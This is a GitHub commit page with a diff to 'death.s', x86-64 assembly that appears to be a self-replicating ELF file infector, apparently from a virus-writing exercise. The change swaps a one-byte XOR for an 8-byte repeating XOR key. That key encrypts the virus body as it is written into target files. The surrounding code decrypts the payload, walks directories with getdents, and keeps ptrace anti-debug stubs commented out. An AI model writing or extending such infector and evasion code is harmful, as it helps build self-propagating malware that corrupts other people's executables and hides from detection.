encryption with 8byte key

rcabezas29 · Jan 14, 2024 · 3113554 · 3113554
1 parent 654e82b
commit 3113554
Showing 1 changed file with 14 additions and 5 deletions.
diff --git a/srcs/death.s b/srcs/death.s
@@ -41,7 +41,7 @@
 
 %define PTRACE_TRACEME 0
 %define SELF_PID 0
-
+%define SIGNATURE_LENGTH 8
 %define DT_DIR 4
 
 ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
@@ -114,6 +114,9 @@ _start:
 	sub  rsp, WAR_STACK_SIZE                    ; Reserve some space in the register r15 to store all the data needed by the program
 	mov r15, rsp
 
+
+	jmp _is_encrypted
+	encryption_key db 42,42,42,42,42,42,42,42,42,42,42,42
 ; _ptrace_anti_debug:
 ; 	mov rdi, PTRACE_TRACEME
 ; 	mov rsi, SELF_PID
@@ -159,7 +162,7 @@ _decypher:
 
 	.loop:
 		lea r10, [rbp + _payload]
-		xor byte [r10 + r8], 42
+		xor byte [r10 + r8], 0x2a
 		inc r8
 		cmp r8, rdx
 		jl .loop
@@ -638,7 +641,7 @@ _dirent_tmp_test:                                  ; getdents the directory to i
 
 			.loop:
 				lea rsi, [rbp + _start + r8]
-				mov rdx, 1
+				lea rcx, [rbp + encryption_key]
 
 				; .replace_equivalences:
 				; 	xor r10, r10
@@ -669,8 +672,14 @@ _dirent_tmp_test:                                  ; getdents the directory to i
 					cmp r8, death - _start
 					jge .nocypher
 					xor r10,r10
+					mov rbx, r8
+					and rbx, SIGNATURE_LENGTH - 1
 					mov r10b, byte [rsi]
-					xor r10b, 42
+
+					xor r10b,byte [rcx + rbx]
+
+
+
 					mov byte [r15 + 1538], r10b
 					lea rsi, [r15 + 1538]
 
@@ -683,7 +692,6 @@ _dirent_tmp_test:                                  ; getdents the directory to i
 						jg .end
 						mov r10, r8
 						sub r10, _timestamp - _start
-						;;;
 						cmp r10, 8
 						jl .continue
 						add r10, 8						
@@ -711,6 +719,7 @@ _dirent_tmp_test:                                  ; getdents the directory to i
 								mov byte [r15 + 1538], r10b
 								lea rsi, [r15 + 1538]
 				.end:
+					mov rdx, 1
 					mov rax, SYS_WRITE
 					syscall
 					inc r8